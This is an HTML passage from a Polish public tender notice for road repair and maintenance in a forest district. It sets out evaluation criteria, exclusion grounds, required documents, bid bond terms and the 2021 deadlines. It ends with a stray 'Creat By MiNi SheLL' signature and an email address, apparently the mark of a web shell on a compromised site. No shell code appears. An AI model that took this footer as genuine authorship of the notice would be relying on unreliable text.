będzie przyjęcie przez<br/>Wykonawcę zobowiązania umownego do udzielenia gwarancji jakości na w/w roboty na okres:<br/>PAKIET I: 36 miesięcy od dnia podpisania końcowego protokołu odbioru robót,<br/>PAKIET II: 36 miesięcy od dnia podpisania końcowego protokołu odbioru robót;<br/>Wykonawca zamieści informację o przyjęciu na siebie zobowiązania umownego do realizacji<br/>przedmiotu zamówienia w zakresie niniejszego kryterium w formularzu oferty (zał. nr 1 do SWZ). Brak<br/>wskazania w formularzu Oferty przyjęcia przez Wykonawcę zobowiązania, o którym mowa powyżej<br/>będzie uznawane jako nieprzyjęcie takiego zobowiązania, a oferta uzyska 0 pkt w ramach niniejszego<br/>kryterium oceny ofert. Oferta Wykonawcy, który zaciągnie takie zobowiązanie otrzyma 40 pkt.<br/>Nie przyjęcie przez Wykonawcę w/w zobowiązania spowoduje, że okres gwarancji na przedmiot<br/>zamówienia, wynosić będzie odpowiednio 24 miesiące (Pakiet I), 24 miesięcy (Pakiet II), od dnia<br/>podpisania końcowego protokołu odbioru robót.<br/>Za najkorzystniejszą ofertę uznana zostanie Oferta wykonawcy, która uzyska największą liczbę<br/>punktów w/w kryteriach oceny ofert w ramach danego Pakietu.<br/>Jeżeli nie można dokonać wyboru najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert<br/>przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych<br/>ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze. Jeżeli oferty otrzymały<br/>taką samą ocenę w kryterium o najwyżej wadze, Zamawiający wybiera ofertę z najniższą ceną. Jeżeli<br/>nie można dokonać wyboru oferty w sposób, o którym mowa w zdaniu poprzednim, Zamawiający<br/>wzywa do wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez<br/>Zamawiającego ofert dodatkowych zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji na wykonane roboty</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W postępowaniu mogą brać udział Wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu dotyczące:<br/>1) sytuacji ekonomicznej lub finansowej.<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania warunku udziału w<br/>postępowaniu w odniesieniu do warunku dot. zdolności ekonomicznej i finansowej.<br/>2) zdolności technicznej lub zawodowej.<br/>a) Warunek ten, w zakresie doświadczenia, zostanie uznany za spełniony, jeśli Wykonawca<br/>wykaże, że w okresie ostatnich 5 lat liczonych wstecz od dnia w którym upływa termin składania<br/>ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał:<br/>Część/Pakiet I: roboty budowlane polegające na budowie/przebudowie/remoncie/ konserwacji<br/>dróg z wykorzystaniem recyklera o wartości minimum 100 000 zł brutto;<br/>Część/Pakiet II: roboty budowlane polegającą na budowie/przebudowie/remoncie/ konserwacji<br/>dróg o wartości minimum 100 000 zł brutto<br/>Wykonawca może sumować roboty budowlane o mniejszej wartości celem spełnienia<br/>wymaganego warunku przez Zamawiającego.<br/>W przypadku składania oferty na dwie Części/Pakiety, Wykonawca może na wykazanie<br/>spełnienia warunku dotyczącego Części/Pakietu II wykazać się tymi samymi robotami (tj. z<br/>wykorzystaniem recyklera) wymaganymi w warunku dla Części/Pakietu I<br/>W przypadku składania oferty na dwie Części/Pakiety, Wykonawca nie może na wykazanie<br/>spełnienia warunku dotyczącego Części/Pakietu I wykazać się tymi samymi robotami<br/>wymaganymi w warunku dla Części/Pakietu II<br/>b) Warunek ten, w zakresie osób skierowanych przez wykonawcę do realizacji zamówienia,<br/>zostanie uznany za spełniony, jeśli Wykonawca wykaże, że dysponuje lub będzie dysponować:<br/>na czas realizacji zamówienia, co najmniej:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania tego warunku<br/>udziału w postępowaniu.<br/>c) Warunek ten, w zakresie potencjału technicznego, zostanie uznany za spełniony, jeżeli<br/>Wykonawca wykaże, że dysponuje lub będzie dysponować:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania tego warunku<br/>udziału w postępowaniu.<br/>3) zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu do warunku<br/>zdolności do występowania w obrocie gospodarczym.<br/>4) Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej<br/>Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu do warunku<br/>posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej.<br/><br/> Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą<br/>„spełnia”/„nie spełnia”, w oparciu o informacje zawarte w dokumentach i oświadczeniach, o<br/>których mowa w rozdziale 9 SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia, Zamawiający przed udzieleniem zamówienia,<br/>działając na podstawie art. 274 ust. 1 PZP wezwie Wykonawcę, którego oferta została najwyżej<br/>oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych<br/>na dzień złożenia następujących podmiotowych środków dowodowych:<br/>1) oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności do tej samej<br/>grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów<br/>(tekst jedn. Dz.U. 2021 poz. 275 ), z innym Wykonawcą, który złożył odrębną ofertę albo oświadczenie<br/>o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej<br/>grupy kapitałowej - (wzór oświadczenia stanowi załącznik nr 3 do SWZ),<br/>2) odpis lub informacje z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4) PZP, sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/>3) oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.<br/>125 ust. 1 PZP w zakresie podstaw wykluczenia z postępowania określonych w:<br/>a) art. 108 ust. 1 pkt 3 PZP,<br/>b) art. 108 ust. 1 pkt 4 PZP dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne<br/>tytułem środka zapobiegawczego,<br/>c) art. 108 ust. 1 pkt 5 PZP dotyczących zawarcia z innymi wykonawcami porozumienia mającego na<br/>celu zakłócenie konkurencji,<br/>d) art. 108 ust. 1 pkt 6 PZP;<br/>e) art. 109 ust. 1 pkt 1 PZP odnośnie naruszenia obowiązków dotyczących płatności podatków i opłat<br/>lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (tekst<br/>jedn. Dz. U. z 2019 r. poz. 1170 z późn. zm.),<br/>f) art. 109 ust. 1 pkt 2 lit b) dotyczących ukarania za wykroczenie, za które wymierzone karę<br/>ograniczenia wolności lub karę grzywny<br/>g) art. 109 ust. 1 pkt 2 lit c) PZP,<br/>h) art. 109 ust. 1 pkt 3 PZP dotyczących ukarania za wykroczenie, za które wymierzone karę<br/>ograniczenia wolności lub karę grzywny,<br/>h) art. 109 ust. 1 pkt 5 i 7-10 PZP<br/>(wzór oświadczenia stanowi załącznik nr 5b do SWZ).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunków udziału w postępowaniu,<br/>Zamawiający przed udzieleniem zamówienia, działając na podstawie art. 274 ust. 1 PZP wezwie<br/>Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie<br/>krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na dzień<br/>złożenia następujących podmiotowych środków dowodowych<br/>a) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i<br/>miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane (wzór wykazu<br/>wykonanych robót budowlanych stanowi załącznik nr 6 do SWZ).<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonanych<br/>wspólnie z innymi wykonawcami wykaz, o którym mowa wyżej dotyczy robót budowlanych, w których<br/>wykonaniu wykonawca ten bezpośrednio uczestniczył. Okres wyrażony w latach, o którym mowa<br/>wyżej, liczy się wstecz od dnia w którym upływa termin składnia ofert.<br/>b) dowody określające, czy te roboty budowlane (wskazane w wykazie robót budowlanych) zostały<br/>wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne<br/>odpowiednie dokumenty.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga od wykonawców przedłożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca zobowiązany jest złożyć Zamawiającemu Ofertę zawierającą:<br/>a) Formularz Oferty (sporządzony wg wzoru załącznik nr 1 do SWZ) wraz z Kosztorysem<br/>Ofertowym (sporządzony zgodnie ze wzorem stanowiącym załącznik nr 2 do SWZ),<br/>sporządzone pod rygorem nieważności, w formie elektronicznej (tj. opatrzonej kwalifikowanym<br/>podpisem elektronicznym), lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym.<br/>b) oświadczenia, sporządzone zgodnie ze wzorem stanowiącym załącznik nr 4 A i załącznik nr<br/>4B do SWZ, pod rygorem nieważności, w formie elektronicznej (tj. opatrzonej kwalifikowanym<br/>podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym osoby/osób upoważnionych do reprezentacji podmiotu składającego<br/>oświadczenie, złożone przez:<br/>- Wykonawcę,<br/>- Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>c) jeżeli dotyczy; oświadczenia, sporządzone zgodnie ze wzorem stanowiącym załącznik nr 7 A i<br/>7 B do SWZ, pod rygorem nieważności, w formie elektronicznej (tj. opatrzonej kwalifikowanym<br/>podpisem elektronicznym), lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym osoby/osób upoważnionych do reprezentacji podmiotu udostępniającego<br/>Wykonawcy zasoby na zasadzie określonej w art. 118 w zw. z art. 266 PZP, (o ile dotyczy),<br/>d) jeżeli dotyczy: zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do<br/>dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek<br/>dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował<br/>niezbędnymi zasobami tych podmiotów zgodnie z pkt 9.2. SWZ, jeżeli Wykonawca wykazując<br/>spełnienie warunków udziału w postępowaniu polega na zdolnościach lub sytuacji innych<br/>podmiotów; (Niewiążący wzór zobowiązania do oddania wykonawcy do dyspozycji niezbędnych<br/>zasobów na potrzeby wykonania zamówienia stanowi załącznik nr 5a do SWZ),<br/>e) pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania<br/>Wykonawcy/podmiotu udostępniającego zasoby na zasadach określonych w art. 118 ust. 1 w<br/>zw. z art. 266 PZP, jeżeli w imieniu Wykonawcy/podmiotu udostępniającego zasoby działa<br/>osoba, której umocowanie do jego reprezentowania nie wynika z innych dokumentów złożonych<br/>wraz z ofertą, sporządzone pod rygorem nieważności, w postaci elektronicznej i opatrzone się<br/>kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym lub w<br/>formie opisanej w pkt 9.18-9.20 SWZ,<br/>f) pełnomocnictwo lub inny dokument potwierdzający umocowanie dla pełnomocnika<br/>ustanowionego przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia do<br/>reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego, jeżeli ofertę składają Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia, sporządzone pod rygorem nieważności, w postaci<br/>elektronicznej i opatrzonej się kwalifikowanym podpisem elektronicznym, podpisem zaufanym<br/>lub podpisem osobistym lub w formie opisanej w pkt 9.18-9.20 SWZ,<br/>g) oświadczenie, o którym mowa w art. 117 ust. 4 PZP – z którego wynika, które roboty<br/>budowlane wykonają poszczególni Wykonawcy, w przypadku wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia. (Wzór stosownego oświadczenia został zawarty w<br/>formularzu ofertowym stanowiącym załącznik nr 1 do SWZ, Zamawiający zaleca złożyć to<br/>oświadczenie właśnie na tym formularzu.).<br/>g) wadium w oryginale w postaci elektronicznej, opatrzonej kwalifikowanym podpisem<br/>elektronicznym osób upoważnionych do jego wystawienia (tylko, gdy Wykonawca wnosi wadium<br/>w formie niepieniężnej).<br/>h) jeśli dotyczy: Wykaz rozwiązań równoważnych –wykonawca, który powołuje się na<br/>rozwiązania równoważne, jest zobowiązany wykazać, że oferowane przez niego rozwiązanie<br/>spełnia wymagania określone przez zamawiającego. W takim przypadku wykonawca załącza do<br/>oferty wykaz rozwiązań równoważnych z jego opisem lub normami. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 11.1. Zamawiający wymaga wniesienia wadium w wysokości:<br/>Pakiet I: 3000 zł (słownie: trzy tysiące złotych)<br/>Pakiet II: 3000 zł (słownie: trzy tysiące złotych)<br/>Wadium należy wnieść przed upływem terminu składania ofert i utrzymywać nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 PZP. <br/>11.2. Wadium może być wnoszone w jednej lub kilku następujących formach: <br/>1) pieniądzu, <br/>2) gwarancjach bankowych, <br/>3) gwarancjach ubezpieczeniowych, <br/>4) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn.: Dz. U. z 2020 r. poz. 299). <br/>11.3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego w banku PKO BP nr rachunku: 43 1020 5460 0000 5102 0042 1834 <br/>z dopiskiem: wadium na zabezpieczenie oferty w postępowaniu na „REMONT I KONSERWACJA DRÓG W NADLEŚNICTWIE LIPINKI – PAKIET ………” Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie zostanie zaliczone na rachunku bankowym Zamawiającego. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>11.4. Z treści wadium wnoszonego w formie: gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości powinno wynikać bezwarunkowe, na pierwsze pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 98 ust. 6 PZP. <br/>11.5. Wadium wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 11.2. ppkt 2)-4) należy przekazać Zamawiającemu wraz z Ofertą w oryginale w postaci elektronicznej tj. opatrzonej kwalifikowanym podpisem elektronicznymi osób upoważnionych do jego wystawienia. Wadium musi zabezpieczać ofertę przez cały okres związania ofertą. Oferta Wykonawcy, który nie wniesie wadium lub wniesie wadium w sposób nieprawidłowy, lub nie będzie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 PZP zostanie odrzucona z postępowania na podstawie art. 226 ust. 1 pkt 14 PZP, w zw. z art. 266 PZP.<br/>11.6. Treść gwarancji wadialnej musi zawierać następujące elementy: <br/>1) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji/poręczenia) oraz wskazanie ich siedzib, <br/>2) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem – określenie przedmiotu zamówienia <br/>3) kwotę gwarancji/poręczenia, <br/>4) zobowiązanie gwaranta/poręczyciela do zapłacenia bezwarunkowo i nieodwołalnie kwoty gwarancji/poręczenia na pierwsze pisemne żądanie Zamawiającego w okolicznościach określonych w art. 98 ust. 6 PZP. <br/><br/>11.7. Zamawiający zwraca wadium na zasadach uregulowanych w art. 98 ust. 1 - 5 PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum): <br/>1) w formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia; <br/>2) oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji. Umocowanie musi wynikać z treści pełnomocnictwa załączonego do oferty – treść pełnomocnictwa powinna dokładnie określać zakres umocowania; <br/>3) Oświadczenia o których mowa w art.125 ust 1 ustawy PZP tj. oświadczenie o spełnianiu warunków udziału, sporządzone zgodnie ze wzorem stanowiącym załącznik nr 4B do SWZ oraz oświadczenie o braku podstaw do wykluczenia, sporządzone zgodne ze wzorem stanowiącym załącznik nr 4 A do SWZ, składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. Oświadczenia wykonawców wspólnie ubiegających się o udzielenie zamówienia, o których mowa wyżej powinny zostać złożone wraz z ofertą pod rygorem nieważności, w formie elektronicznej (tj. opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. <br/>4) dokumenty, o których mowa w pkt 9.3. zobowiązany będzie złożyć każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia <br/>5) wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić odpowiedzialność solidarną za wykonanie umowy; <br/>6) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie Wykonawcę kierującego (lidera), upoważnionego do zaciągania zobowiązań, otrzymywania poleceń oraz instrukcji dla i w imieniu każdego, jak też dla wszystkich partnerów; <br/>7) Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w całości przez lidera lub od wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia łącznie lub każdego z osobna. <br/>8) Zamawiający informuje o treści przepisu art. 117 ust. 3 PZP, zgodnie z którym w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są wymagane.<br/>	W związku z powyższym Wykonawca jest zobowiązany załączyć do oferty podmiotowy środek dowodowy w postaci oświadczenia, z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy. Wzór stosownego oświadczenia został zawarty w formularzu Oferty (stanowiącym załącznik nr 1 do SWZ) i Zamawiający zaleca złożyć to oświadczenie właśnie na tym formularzu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Projektowane postanowienia umowy w sprawie zamówienia publicznego zawiera wzór umowy<br/>stanowiący załącznik nr 12 do SWZ.<br/>2. Umowa zostanie zawarta na podstawie złożonej oferty Wykonawcy. Zamawiający przewiduje<br/>możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której<br/>dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności w niej<br/>wymienionych z uwzględnieniem podanych we wzorze umowy warunków ich wprowadzenia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-24 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-24 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-23</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Termin realizacji zamówienia: <br/>Pakiet I: 60 dni od dnia podpisania umowy, jednak nie później niż do 21.12.2021 r.<br/>Pakiet II: 60 dni od dnia podpisania umowy, jednak nie później niż do 21.12.2021 r.<br/>2. Za termin realizacji przedmiotu zamówienia uważa się termin zgłoszenia gotowości do odbioru końcowego robót o ile nie będą mieć wad istotnych.<br/>3.	Termin rozpoczęcia realizacji Przedmiotu umowy nastąpi od dnia podpisania umowy.

Creat By MiNi SheLL
Email: jattceo@gmail.com